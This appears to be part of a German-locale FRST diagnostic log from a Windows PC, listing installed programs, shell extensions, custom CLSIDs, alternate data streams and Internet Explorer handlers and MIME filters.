Microsoft .NET Host FX Resolver - 6.0.20 (x86) (HKLM-x32\...\{561137EF-2ECE-48F0-A6D6-6260AC7112A5}) (Version: 48.83.63169 - Microsoft Corporation) Hidden
Microsoft .NET Host FX Resolver - 8.0.4 (x86) (HKLM-x32\...\{3F083079-02CA-463E-B3D1-0E23567A0A11}) (Version: 64.16.12025 - Microsoft Corporation) Hidden
Microsoft .NET Runtime - 6.0.20 (x86) (HKLM-x32\...\{6E4984A9-4321-4D96-861F-D03578E68C8B}) (Version: 48.83.63169 - Microsoft Corporation) Hidden
Microsoft .NET Runtime - 8.0.4 (x86) (HKLM-x32\...\{E3319B20-3820-455B-953D-8D9D2FF2B17D}) (Version: 64.16.12025 - Microsoft Corporation) Hidden
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 131.0.2903.112 - Microsoft Corporation)
Microsoft Edge WebView2-Laufzeit (HKLM-x32\...\Microsoft EdgeWebView) (Version: 131.0.2903.112 - Microsoft Corporation) Hidden
Microsoft Office Professional Plus 2019 - de-de (HKLM\...\ProPlus2019Volume - de-de) (Version: 16.0.10416.20027 - Microsoft Corporation)
Microsoft Office Professional Plus 2019 - en-us (HKLM\...\ProPlus2019Volume - en-us) (Version: 16.0.10416.20027 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1775496863-3233068474-2158662417-1002\...\OneDriveSetup.exe) (Version: 24.226.1110.0004 - Microsoft Corporation)
Microsoft Teams classic (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Teams) (Version: 1.7.00.3653 - Microsoft Corporation)
Microsoft Teams Meeting Add-in for Microsoft Office (HKLM\...\{A7AB73A3-CB10-4AA5-9D38-6AEFFBDE4C91}) (Version: 1.24.31301 - Microsoft)
Microsoft Update Health Tools (HKLM\...\{C6FD611E-7EFE-488C-A0E0-974C09EF6473}) (Version: 5.72.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40649 (HKLM-x32\...\{5d0723d3-cff7-4e07-8d0b-ada737deb5e6}) (Version: 12.0.40649.5 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40649 (HKLM-x32\...\{35b83883-40fa-423c-ae73-2aff7e1ea820}) (Version: 12.0.40649.5 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40649 (HKLM\...\{20C1086D-C843-36B1-B678-990089D1BD44}) (Version: 12.0.40649 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40649 (HKLM\...\{ABB19BB4-838D-3082-BDA4-87C6604181A2}) (Version: 12.0.40649 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40649 (HKLM-x32\...\{A8589745-51BC-3963-B4E9-201CF8693538}) (Version: 12.0.40649 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40649 (HKLM-x32\...\{DEA7F8E3-B7B9-3C3C-945B-7F8CE9041748}) (Version: 12.0.40649 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.40.33816 (HKLM-x32\...\{77169412-f642-45e7-b533-0c6f48de12f9}) (Version: 14.40.33816.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.40.33810 (HKLM-x32\...\{47109d57-d746-4f8b-9618-ed6a17cc922b}) (Version: 14.40.33810.0 - Microsoft Corporation)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.40.33816 (HKLM\...\{5904914B-9FC8-44C2-AE48-5C7F30A603EC}) (Version: 14.40.33816 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.40.33816 (HKLM\...\{560D2DA4-096E-4868-B22A-DA6418FDE6FB}) (Version: 14.40.33816 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.40.33810 (HKLM-x32\...\{5EA6C998-D5AC-4ED9-89C3-9F25B17CCD3D}) (Version: 14.40.33810 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.40.33810 (HKLM-x32\...\{0C3457A0-3DCE-4A33-BEF0-9B528C557771}) (Version: 14.40.33810 - Microsoft Corporation) Hidden
Microsoft Visual Studio Code (HKLM\...\{EA457B21-F73E-494C-ACAB-524FDE069978}_is1) (Version: 1.86.2 - Microsoft Corporation)
Microsoft Windows Desktop Runtime - 6.0.20 (x86) (HKLM-x32\...\{39139702-799e-4843-8d90-cfe9330b285a}) (Version: 6.0.20.32621 - Microsoft Corporation)
Microsoft Windows Desktop Runtime - 6.0.20 (x86) (HKLM-x32\...\{FC641ACB-FE5E-4F88-B392-9421BDCA1143}) (Version: 48.83.63194 - Microsoft Corporation) Hidden
Microsoft Windows Desktop Runtime - 8.0.4 (x86) (HKLM-x32\...\{32e2abd1-d551-490e-897a-e59b2c59be7b}) (Version: 8.0.4.33519 - Microsoft Corporation)
Microsoft Windows Desktop Runtime - 8.0.4 (x86) (HKLM-x32\...\{DC4621E6-9421-4CE6-9E5E-04126FAAA400}) (Version: 64.16.12024 - Microsoft Corporation) Hidden
MobaXterm (HKLM-x32\...\{79CD2C42-8C19-483C-9C01-FE493E289079}) (Version: 24.0.0.5204 - Mobatek)
MSEdgeRedirect (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\MSEdgeRedirect) (Version: 0.7.0.1 - Robert Maehl Software)
MTOP Client (HKLM-x32\...\{5E2CAAA1-0D66-4FD3-B162-85CC119315C6}) (Version: 24.9.0.226 - Citrix Systems, Inc.) Hidden
Node.js (HKLM\...\{6F56DDC2-C83A-4501-AB01-F81988163858}) (Version: 16.14.0 - Node.js Foundation)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 8.6.9 - Notepad++ Team)
Npcap (HKLM-x32\...\NpcapInst) (Version: 1.79 - Nmap Project)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.10416.20027 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.10416.20027 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0407-1000-0000000FF1CE}) (Version: 16.0.10416.20027 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0409-1000-0000000FF1CE}) (Version: 16.0.10416.20027 - Microsoft Corporation) Hidden
Online Plug-in (HKLM-x32\...\{C3E80A55-A7DC-4D65-98FA-1EA649881718}) (Version: 24.9.0.226 - Citrix Systems, Inc.) Hidden
Oracle VM VirtualBox 7.0.10 (HKLM\...\{16919967-9ED2-47C0-B86C-987992BA491F}) (Version: 7.0.10 - Oracle and/or its affiliates)
Outlook Google Calendar Sync (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\OutlookGoogleCalendarSync) (Version: 2.11.0-beta - Paul Woolcock)
Paradox Launcher v2 (HKLM\...\{8C5CF4CE-D589-40B4-A77F-01FD64602C50}) (Version: 2.4.0 - Paradox Interactive)
PDFCreator (HKLM\...\{1E0CF1C6-D640-4566-8E6F-2C2708422A25}) (Version: 4.4.2 - pdfforge GmbH)
Postman x86_64 10.8.0 (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Postman) (Version: 10.8.0 - Postman)
Python 3.10.2 (64-bit) (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\{c60fd5ac-367d-4e3a-a975-f157502ac30a}) (Version: 3.10.2150.0 - Python Software Foundation)
Python 3.10.2 Add to Path (64-bit) (HKLM\...\{F55A8CCD-A817-4C53-91B8-4B7E6C49DA7B}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 Core Interpreter (64-bit) (HKLM\...\{6475B354-B0F6-4837-8738-784937D647B2}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 Development Libraries (64-bit) (HKLM\...\{8277936D-8A34-4758-893C-0B29342A6F27}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 Documentation (64-bit) (HKLM\...\{B51A07AD-9BCE-485D-8721-C7C83992794B}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 Executables (64-bit) (HKLM\...\{EDEE3162-8399-42D4-9D7C-7DA21275BFD0}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 pip Bootstrap (64-bit) (HKLM\...\{08B7036F-0609-4634-9A5F-1688230E9D9D}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 Standard Library (64-bit) (HKLM\...\{D862D299-FDC2-4571-B3A1-27CEE951D2D1}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 Tcl/Tk Support (64-bit) (HKLM\...\{7863DF45-23BB-4D83-97B3-CF08F3192F5B}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 Test Suite (64-bit) (HKLM\...\{D68594E9-2F98-4EA0-8A94-5D7D9FF51960}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 Utility Scripts (64-bit) (HKLM\...\{300F0759-8294-4971-9FAD-7AB19FA7B270}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python Launcher (HKLM-x32\...\{0CD41B07-EDF9-4B77-8C7C-CCCA1C435970}) (Version: 3.10.7686.0 - Python Software Foundation)
QNAP Qsync Client (HKLM-x32\...\Qsync) (Version: 5.1.1.0830 - QNAP Systems, Inc.)
Raspberry Pi Imager (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Raspberry Pi Imager) (Version: 1.8.5 - Raspberry Pi Ltd)
Realtek USB Audio (HKLM\...\{0A46A65D-89AC-464C-8026-3CD44960BD04}) (Version: 6.3.9600.250 - Realtek Semiconductor Corp.)
RealVNC Viewer 7.10.0 (HKLM\...\{8B27D0E9-9C84-4384-AF24-5C543C796381}) (Version: 7.10.0.52294 - RealVNC)
Riot Vanguard (HKLM\...\Riot Vanguard) (Version: - Riot Games, Inc.)
Self-Service Plug-in (HKLM-x32\...\{BD2822BC-6B66-4B8C-AE77-E3009471FCA5}) (Version: 24.9.1.86 - Citrix Systems, Inc.) Hidden
Signal 5.62.0 (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\7d96caee-06e6-597c-9f2f-c7bb2e0948b4) (Version: 5.62.0 - Signal Messenger, LLC)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
SteelSeries GG 28.2.0 (HKLM\...\SteelSeries GG) (Version: 28.2.0 - SteelSeries ApS)
TeamViewer (HKLM\...\TeamViewer) (Version: 15.57.5 - TeamViewer)
tiptoi® Manager 5.2 (HKLM\...\{833392BB-E8C0-4066-9408-3A30FA43972F}_is1) (Version: 5.2 - Ravensburger AG)
VALORANT (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Riot Game valorant.live) (Version: - Riot Games, Inc)
ViGEm Bus Driver (HKLM\...\{869109FC-8D5A-46D0-B619-47D7E4173D93}) (Version: 1.16.115 - Nefarius Software Solutions e.U.)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.18 - VideoLAN)
WhatsApp (Outdated) (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\WhatsApp) (Version: 2.2326.10 - WhatsApp)
Windows SDK AddOn (HKLM-x32\...\{E18618EC-D9DB-4BCE-B382-85ADA2CBB340}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Subsystem for Linux (HKLM\...\{9123DBDC-D242-4A68-9E97-841E2A788E7C}) (Version: 2.3.26.0 - Microsoft Corporation) Hidden
Windows Subsystem for Linux Update (HKLM\...\{36EF257E-21D5-44F7-8451-07923A8C465E}) (Version: 5.10.16 - Microsoft Corporation)
Windows*11-Installationsassistent (HKLM-x32\...\{115DF11E-4B4C-4EA9-9A79-00DB0C7EF02D}) (Version: 1.4.19041.3630 - Microsoft Corporation)
Windows-PC-Integritätsprüfung (HKLM\...\{A5F151BA-B6DF-4659-83C0-13692B76634F}) (Version: 3.9.2402.14001 - Microsoft Corporation)
Wireshark 4.4.2 x64 (HKLM-x32\...\Wireshark) (Version: 4.4.2 - The Wireshark developer community, hxxps://www.wireshark.org)
Zoom (HKLM\...\{E5F9EFAB-11E7-48E4-B8E7-B3614E5FFCE0}) (Version: 5.9.3169 - Zoom)
Chrome apps:
============
Horizon TV (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\40e086a192918ecee8ef0aacbeb33e8e) (Version: 1.0 - Google\Chrome)
kitaplus Eltern-App (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\760d5e85cd93ae9d0ee4f7ded7868fdb) (Version: 1.0 - Google\Chrome)
Sheets (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\8ebb79ee4871db32937e17d29a25dd81) (Version: 1.0 - Google\Chrome)
Packages:
=========
Adobe Acrobat Reader -> C:\Program Files\Adobe\Acrobat DC [2024-12-13] ()
AMD Radeon Software -> C:\Program Files\WindowsApps\AdvancedMicroDevicesInc-2.AMDRadeonSoftware_10.21.30024.0_x64__0a9344xs7nr4m [2024-04-25] (Advanced Micro Devices Inc.) [Startup Task]
Dolby Audio Premium -> C:\Program Files\WindowsApps\DolbyLaboratories.DolbyAudioPremium_3.20500.501.0_x64__rz1tebttyb220 [2022-02-28] (Dolby Laboratories)
Notepad++ -> C:\Program Files\Notepad++\contextMenu [2024-10-12] (Notepad++)
SmartAudio 3 -> C:\Program Files\WindowsApps\22094SynapticsIncorporate.SmartAudio3_1.0.85.0_x64__qt57b6kdvhcfw [2022-05-19] (Synaptics Hong Kong Limited, Taiwan Branch (H.K.))
Synaptics TouchPad Control Panel -> C:\Program Files\WindowsApps\SynapticsIncorporated.SynapticsControlPanel_19005.19089.0.0_x64__807d65c4rvak2 [2024-12-18] (Synaptics Incorporated)
Synaptics Trackpoint Control Panel -> C:\Program Files\WindowsApps\SynapticsIncorporated.241916F58D6E7_19005.19089.0.0_x64__807d65c4rvak2 [2024-12-18] (Synaptics Incorporated)
WinAppRuntime.Main.1.5 -> C:\Program Files\WindowsApps\MicrosoftCorporationII.WinAppRuntime.Main.1.5_5001.311.2039.0_x64__8wekyb3d8bbwe [2024-11-13] (Microsoft Corp.)
WinAppRuntime.Singleton -> C:\Program Files\WindowsApps\MicrosoftCorporationII.WinAppRuntime.Singleton_6000.318.2304.0_x64__8wekyb3d8bbwe [2024-11-19] (Microsoft Corp.)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
CustomCLSID: HKU\S-1-5-21-1775496863-3233068474-2158662417-1002_Classes\CLSID\{38142727-3008-9161-1521-349515000000}\localserver32 -> C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe (Adobe Inc. -> Adobe)
CustomCLSID: HKU\S-1-5-21-1775496863-3233068474-2158662417-1002_Classes\CLSID\{57D0E8CF-2552-4B76-A5C4-B1E9D413FD14} -> [Qsync] => C:\Users\Lisa\AppData\Local\QNAP\Qsync\Quick Access [2022-02-28 20:57]
CustomCLSID: HKU\S-1-5-21-1775496863-3233068474-2158662417-1002_Classes\CLSID\{9107EB34-31A0-4430-A1DD-C5E81E54DB1B} -> [QNAP Qsync Client: Roell-NAS-01 (Qsync)] => C:\Users\Lisa\Qsync [2022-02-28 20:58]
ShellIconOverlayIdentifiers: [ QsyncEx_Icon1] -> {17affcaf-2e65-4b1b-98a1-a7b3b4d8ad36} => C:\Program Files (x86)\QNAP\Qsync\QsyncExt.dll [2022-09-23] (QNAP Systems, Inc. -> )
ShellIconOverlayIdentifiers: [ QsyncEx_Icon2] -> {78BEB65D-D83B-4C30-8E05-2833458A55A4} => C:\Program Files (x86)\QNAP\Qsync\QsyncExt.dll [2022-09-23] (QNAP Systems, Inc. -> )
ShellIconOverlayIdentifiers: [ QsyncEx_Icon3] -> {DD7A6BC5-2ADD-48F2-83AE-9735C22220FA} => C:\Program Files (x86)\QNAP\Qsync\QsyncExt.dll [2022-09-23] (QNAP Systems, Inc. -> )
ShellIconOverlayIdentifiers: [ QsyncEx_Icon4] -> {68580D39-71D8-4196-BC7A-0CFE3B90E38A} => C:\Program Files (x86)\QNAP\Qsync\QsyncExt.dll [2022-09-23] (QNAP Systems, Inc. -> )
ShellIconOverlayIdentifiers: [ GoogleDriveCloudOverlayIconHandler] -> {A8E52322-8734-481D-A7E2-27B309EF8D56} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers: [ GoogleDriveMirrorBlacklistedOverlayIconHandler] -> {51EF1569-67EE-4AD6-9646-E726C3FFC8A2} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers: [ GoogleDrivePinnedOverlayIconHandler] -> {CFE8B367-77A7-41D7-9C90-75D16D7DC6B6} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers: [ GoogleDriveProgressOverlayIconHandler] -> {C973DA94-CBDF-4E77-81D1-E5B794FBD146} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers-x32: [ GoogleDriveCloudOverlayIconHandler] -> {A8E52322-8734-481D-A7E2-27B309EF8D56} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers-x32: [ GoogleDriveMirrorBlacklistedOverlayIconHandler] -> {51EF1569-67EE-4AD6-9646-E726C3FFC8A2} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers-x32: [ GoogleDrivePinnedOverlayIconHandler] -> {CFE8B367-77A7-41D7-9C90-75D16D7DC6B6} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers-x32: [ GoogleDriveProgressOverlayIconHandler] -> {C973DA94-CBDF-4E77-81D1-E5B794FBD146} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-12-26] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers1: [DriveFS 28 or later] -> {EE15C2BD-CECB-49F8-A113-CA1BFC528F5B} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.)
ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => C:\Program Files\PDFCreator\PDFCreatorShell.DLL [2021-11-18] (pdfforge GmbH -> pdfforge GmbH)
ContextMenuHandlers1: [QsyncExt] -> {17affcaf-2e65-4b1b-98a1-a7b3b4d8ad36} => C:\Program Files (x86)\QNAP\Qsync\QsyncExt.dll [2022-09-23] (QNAP Systems, Inc. -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-12-26] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers4: [DriveFS 28 or later] -> {EE15C2BD-CECB-49F8-A113-CA1BFC528F5B} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.)
ContextMenuHandlers4: [QsyncExt] -> {17affcaf-2e65-4b1b-98a1-a7b3b4d8ad36} => C:\Program Files (x86)\QNAP\Qsync\QsyncExt.dll [2022-09-23] (QNAP Systems, Inc. -> )
ContextMenuHandlers5: [DriveFS 28 or later] -> {EE15C2BD-CECB-49F8-A113-CA1BFC528F5B} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.)
ContextMenuHandlers5: [QsyncExt] -> {17affcaf-2e65-4b1b-98a1-a7b3b4d8ad36} => C:\Program Files (x86)\QNAP\Qsync\QsyncExt.dll [2022-09-23] (QNAP Systems, Inc. -> )
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-12-26] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers6: [QsyncExt] -> {17affcaf-2e65-4b1b-98a1-a7b3b4d8ad36} => C:\Program Files (x86)\QNAP\Qsync\QsyncExt.dll [2022-09-23] (QNAP Systems, Inc. -> )
==================== Codecs (Nicht auf der Ausnahmeliste) ====================
==================== Verknüpfungen & WMI ========================
==================== Geladene Module (Nicht auf der Ausnahmeliste) =============
2022-05-19 15:47 - 2022-05-19 15:47 - 000181248 _____ (pdfforge GmbH) [Datei ist nicht signiert] C:\WINDOWS\System32\pdfcmon.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
AlternateDataStreams: C:\ProgramData\ChrEdgeFkOff.vbs:F4FC0A6059 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access.lnk:A1B76439FE [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Arduino.lnk:34D926B811 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Barrier.lnk:306D5B6041 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk:B96E9B8455 [3442]
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================
==================== Internet Explorer (Nicht auf der Ausnahmeliste) =============
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL [2024-10-11] (Microsoft Corporation -> Microsoft Corporation)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
